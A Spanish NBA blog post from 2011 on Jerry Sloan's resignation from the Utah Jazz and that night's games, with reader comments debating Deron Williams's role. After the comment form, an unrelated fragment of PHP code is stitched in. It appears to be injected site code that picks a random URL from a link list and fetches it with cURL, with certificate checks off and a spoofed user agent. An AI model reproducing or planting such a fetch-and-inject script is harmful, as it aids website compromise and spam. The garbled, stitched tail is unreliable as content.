La Crónica (10/02/2011)

11 de February de 2011 por TheDeerHunter

No nos hubiera gustado abrir con la noticia de la dimisión de Jerry Sloan. Ayer a última hora de la tarde saltó la liebre y pronto aquí nos hicimos eco de la situación. Tras 20 años en el equipo y más de 1.200 victorias con la misma camiseta. En una ciudad y una franquicia humilde como los Salt Lake City y los Utah Jazz, ¿cuantas veces le vimos arrastrarse por la liga como han hecho tantos otros? Un único año por debajo del 50% de victorias. 14 de los 20 por encima del 60%. En sólo 3 ocasiones no alcanzaron playoffs. 2 Finales perdidas ante Jordan, 4 finales de conferencia. Ni siquiera perder de golpe a Stockton y Malone fue excusa para rendirse. El técnico más duro de la NBA… y había renovado el lunes.

La prostitución del deporte convertido en espectáculo y a la vez en industria alcanza el punto en el que nadie está a salvo. Un jugador, por muy bueno que sea, que mañana puede largarse a cualquier equipo que ponga un fajo más gordo encima de la mesa (como ya hemos comprobado recientemente) hace y deshace con la planificación a medio-largo plazo con absoluta arbitrariedad y egoísmo, pasándose por el arco del triunfo la trayectoria más sólida si ésta vende menos camisetas. Mañana, cuando los Jazz pasen de clavar un 60% temporada sí y temporada también a vender a sus madres por firmar un 50%, Deron Williams se quejará de que la franquicia no pone los medios para alcanzar su soñado anillo y se largará con viento fresco dejando a más de un tonto con la cara que tiene. En esto se ha convertido la industria. Si esto ha pasado aquí ¿qué es lo que no puede pasar en otros lugares?

Dejando un poco de lado los temas escabrosos y desagradables anoche hubo jornada. El Lakers@Boston quedó eclipsado ante un tsunami de tal categoría y nosotros vivimos el duelo aún en estado de shock. Los campeones recuperaron mucho de su crédito perdido con su mejor defensa del curso en la segunda parte. No pudieron evitar que Ray Allen rebasara el récord absoluto de triples de Reggie Miller. Necesitaba 2 y logró 3 con el magnífico premio de pasar a la historia recogiendo el legado del mítico crack de los Pacers con un emotivo abrazo. Se paró el partido para ello a colación de lo que hablábamos ayer. Desconozco si se pararía un Madrid-Barça para ese tipo de homenajes por estos lares.

Los Celtics empezaron destrozando a los amarillos de la misma forma que en el partido de ida. Maniatados, nerviosos y perdiendo muchos balones los amarillos se mostraban impotentes. En la segunda parte todo cambió y quizás por una pérdida de concentración los locales se colapsaron. Pau, Gasol, Bynum y Odom mostraron su mejor versión y se la devolvieron a sus máximos rivales. Odom terminó con una brecha en la cabeza tras un choque fortuito con Pau (92-86).

Disfrutamos también de un partidazo en Denver. Los Mavs no tuvieron en Nowitzki su referente pero lo encontraron en el sorprendente Tyson Chandler y en Jason Terry. El mejor partido del curso de Billups y Carmelo fue un intercambio de golpes de los buenos, aunque con un pelín más de defensa igual no hubieran sufrido tanto ni unos ni otros. El choque se decidió a la ruleta rusa y la fortuna le sonrió a otro inesperado héroe. Afflalo cuajó un gran partido y lo culminó con un canastón sobre la bocina que suponía una brillante victoria para él y su equipo (120-121).

Finalmente asistimos a la peor versión de los Warriors (88-112). Monta y Wright tuvieron una noche negra. Los Suns lo aprovecharon con un gran juego colectivo y recuperan el 50% de victorias y el rebufo de los Blazers.

PREMIOS

MVP: ¡Vaya, vaya con la parejita¡ La dupla Carmelo-Billups demuestra que aún puede dar muchas alegrías y anoche dio y muy gorda a sus aficionados. Anotaron 72 puntos entre ambos con una buena serie de 27 canastas en 44 intentos, aportando además 12 rebotes, 12 asistencias y 4 robos. Eso sí, la canasta ganadora fue de Arron Afflalo.

Rookie: El GSW-PHO sirvió para que jugadores que no cuentan con minutos normalmente, jugaran más tiempo del habitual. Uno que aprovechó la ocasión fue Zabian Dowdell del que hablamos a continuación. Otro que también lo hizo fue el discutido Ekpe Udoh que anotó 16 puntos,capturó 7 rebotes y robó 3 balones.

Sorpresa: Zabian Dowdell. “Perdona, ¿quién?”. Zabian Dowdell, ex jugador del Unicaja de Málaga, un auténtico desconocido en la NBA. Aprovechando que los Suns solucionaron por la vía rápida el partido frente los Warriors, Dowdell disfrutó de 21 minutos en los que anotó 10 puntos, repartió 6 asistencias y pilló 5 rebotes.

Decepción: Patética actuación de buena parte de los Warriors. Biedrins 1 de 5, Wright 1 de 9, Ellis 4 de 13Así es imposible ganar a nadie.

Esfuerzo en vano: La temporada de Tyson Chandler está siendo para enmarcar y él es uno de los culpables del buen hacer de los Mavs a pesar de las lesiones. Anoche fue el que más plantó cara a los Nuggets con 20 puntos (8 de 9) y 11 rebotes.

Imágenes | AP Photos / Getty Images

Comenta

16 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    Es difícil saber qué es lo que realmente ha ocurrido. ¿Nos creemos las palabras de Deron Williams?

    “I would never force Coach Sloan out of Utah. He’s meant more to this town, to this organization than I have, by far. That’s not my place. If that was the case, I would’ve just said I wanted out before.”

    De hecho ya hay varias voces en defensa de Deron, Kobe sin ir más lejos, tal y como recoge Wojnarowski en su artículo de hoy, bastante crítico con Sloan, por cierto: http://sports.yahoo.com/nba/news;_ylt=Aioc.GORd1UQV0DS5I91GM.8vLYF?slug=aw-sloanwilliams021111

    En cuando al Lakers @ Celtics… Qué partido más serio de los Lakers, qué paciencia (especialmente Kobe) para jugar cuando las cosas iban mal y qué solidez para mantener la ventaja en el tramo final. Necesitaban una victoria así.

      Citar

  2. TheDeerHunter dice:
    #2

    ¿qué va a decir públicamente Deron? ¿y qué va a decir Kobe si él lo entiende más que nadie?? En cualquier caso el jugador no ha tomado la decisión… pero obviamente sí habrá contribuido para que se tome y de manera directa o indirecta forzado una situación.
    En realidad yo no le culpo. Culpo a los que se dejan influir por la fuerza de un jugador… que mañana estará vistiendo otra camiseta en cuanto le venga en gana. Y, sobre todo, critico las formas… impresentable. Terrible.

    y Adande tampoco dice lo mismo precisamente: http://sports.espn.go.com/nba/columns/story?columnist=adande_ja&page=sloanadande-110210

    Los argumentos de Wojnarowski giran en torno a un hecho objetivo, que Sloan tiene 68 y que probablemente no ha cambiado como todo ha cambiado a su alrededor estos 20 años. No dudo que sea así, pero que lo tiren los resultados si de verdad era tan viejo y tan estancado. ¿O es que no tenía 68 años y 20 a cuestas el lunes cuando le renovaron?? amoshombrenomejodassss…

    Cito el artículo de Wojnarowski :< >

    Esto lo van a pagar muy caro los que lo han provocado. Al tiempo. Lo verá Sloan cómodamente sentado en su sofá de lujo y espero que con una buena cerveza en la mano.

      Citar

  3. Pop dice:
    #3

    Ver a los Jazz sin Jerry Sloan será como verlos jugar con equipación naranja. Si me ha costado años imaginarlos sin Stockton-Malone, esto ya es la puntilla.

    Se puede discutir si es decisión acertada, si D-Will tiene o no la culpa o mil cosas más. Pero que este monstruo de los banquillos tenga esta salida es una vergüenza total para la franquicia.

      Citar

  4. MagicJohnson32 dice:
    #4

    Ojo, que ha sido una dimisión, que parece que estemos hablando de que lo han echado y que Deron ha presionado para ello.

    Tampoco me alargo demasiado, que es un buen tema para el próximo “Reflexiones…” jeje.

      Citar

  5. TheDeerHunter dice:
    #5

    Por cierto… @Denise: ¿Bien en la copa Sergio y Claver, no???

      Citar

  6. TheDeerHunter dice:
    #6

    Supongo que en una dimisión se pueden hacer muchas cosas por parte de quien corresponda…

    No me creo que Sloan dimita simplemente por un calentón con Deron Williams.

      Citar

  7. MagicJohnson32 dice:
    #7

    No, yo tampoco lo creo. Es más probable que se haya aburrido de perder en Playoffs contra los Lakers y no quiera sufrirlo por cuarto año consecutivo, jeje.

      Citar

  8. TX dice:
    #8

    D.E.P. Utah Jazz

      Citar

  9. Denise dice:
    #9

    Hay debe haber algo mas, no creo que porque Sloan esté enfadado con Deron dimita. Supongo que tambien habrá tenido discusiones con sus jefes.
    Será ventajista Deerhunter, todo el año callado y ahora me la lanza, aprovechando un partido bueno de entre cien que hacen Sergio y Claver. Ya veremos que hacen en semifinales, Claver no tiene sangre, tiene horchata, y Sergio se hace caquita cuando juega contra un “grande”.
    Por cierto, Claver y los valencianos también conocen muy bien a Dowdell. Les ganó un partido de playoff sobre la bocina.

      Citar

  10. TheDeerHunter dice:
    #10

    Puede sonar ventajista… y puede sonar a puya, pero no era ni una cosa ni la otra.
    No suelo seguir el baloncesto europeo nada más que puntualmente y la copa del rey suele ser una de esas puntualidades. Así que ahora hablo porque tengo de qué hablar y en otras ocasiones simplemente no puedo tener opinión.
    Y la pregunta… era simplemente una pregunta para que opinaras sobre el tema desde tu conocida posición crítica. Vamos para abrir un debate.
    Como estás de sensible, chico…. 😀

      Citar

  11. TheDeerHunter dice:
    #11

    Por cierto… soy valenciano y no tengo ni puñetera idea de quién carajo es Dowdell. XD XD XD

      Citar

  12. Denise dice:
    #12

    pero si yo no me enfado por esto…faltaria mas…
    Pues Dowdell ganó con el Unicaja un partido al Pamesa (por aquel entonces) cogiendo la bola en el medio campo y en tres segundos se recorrió la mitad de pista y dejo una sutil bandeja que hizo que el Unicaja se hiciese con el factor cancha y posteriormente con la eliminatoria.
    Ahi llevas el video 🙂
    http://blogs.acb.com/blog/barranquero/post/dowdell-se-viste-de-bullock

      Citar

  13. TheDeerHunter dice:
    #13

    Ah, ya me acuerdoooo…
    casualmente estaba allí presente, en la fonteta, pero recordaba que había sido Omar Cook
    Jojojo!!! Menuda robada de partido le pegaron al power!!! Pucherazo, Daimiel!!!

      Citar

  14. Denise dice:
    #14

    Si claro, echadle la culpa al arbitro, la excusa de siempre. Anda que no son claros los pasos de salida de Kelati en la canasta previa de Simeón.
    Y vaya careto se le queda a Nielsen 🙂

      Citar

  15. TheDeerHunter dice:
    #15

    Ya, es verdad. Los árbitros nunca se equivocan y menos aún favorecen a determinados equipos. Los reyes tampoco son los papás.
    No tengo otra cosa mejor que hacer que ponerme a polemizar sobre un partido que en su día me importaba bastante poco, del que ya ha llovido, que condujo a sus implicados a ningún sitio y que es un off-topicazo como un tren de grande. De eso yo paso, Denise… lo que tú quieras.

      Citar

  16. scriers dice:
    #16

    Pues yo creo que Sloan viene amagando con el retiro desde hace temporadas, con la mujer enferma y el equipo que se mantiene con tesón y menos medios cada vez. Así que no es de extrañar que se acumularan varios elementos para que renunciara. No será, seguro, la primera vez que Sloan trata con fuertes egos, ni será la primera vez que tiene problemas (Kirilenko). Sin embargo, ahora han escogido irse. Eso es por cansancio. Deberían retirar su camisa, qué crack Sloan :P.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>